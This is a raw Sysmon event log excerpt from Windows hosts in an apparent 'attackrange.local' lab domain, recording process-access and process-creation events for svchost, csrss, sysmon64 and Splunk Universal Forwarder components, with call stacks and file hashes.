22:12:31.488{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359976Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:31.488{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359975Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:31.488{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359974Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:31.488{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359973Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:31.488{8e433fbf-2a44-6013-0600-000000001100}7565040C:\Windows\system32\csrss.exe{8e433fbf-36cf-6013-9403-000000001100}10196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf
10341000x8000000000000000359972Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:31.488{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-36cf-6013-9403-000000001100}10196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
154100x8000000000000000359971Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:31.490{8e433fbf-36cf-6013-9403-000000001100}10196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service
10341000x800000000000000032712Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.835{FF16AF91-36D0-6013-6A03-00000000A401}14125668C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032711Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.694{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-36D0-6013-6A03-00000000A401}1412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032710Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.694{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032709Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.694{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032708Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.694{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032707Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.694{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032706Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.694{FF16AF91-26B4-6013-0500-00000000A401}6441200C:\Windows\system32\csrss.exe{FF16AF91-36D0-6013-6A03-00000000A401}1412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f
10341000x800000000000000032705Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.694{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-36D0-6013-6A03-00000000A401}1412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
154100x800000000000000032704Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.695{FF16AF91-36D0-6013-6A03-00000000A401}1412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service
10341000x8000000000000000359997Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.957{8e433fbf-36d0-6013-9603-000000001100}1033211148C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359996Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.801{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-36d0-6013-9603-000000001100}10332C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359995Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.801{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359994Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.801{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359993Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.801{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359992Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.801{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359991Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.801{8e433fbf-2a44-6013-0600-000000001100}7561420C:\Windows\system32\csrss.exe{8e433fbf-36d0-6013-9603-000000001100}10332C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf
10341000x8000000000000000359990Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.801{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-36d0-6013-9603-000000001100}10332C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
154100x8000000000000000359989Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.804{8e433fbf-36d0-6013-9603-000000001100}10332C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service
10341000x800000000000000032703Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.023{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-36D0-6013-6903-00000000A401}1128C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032702Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.023{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032701Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.023{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
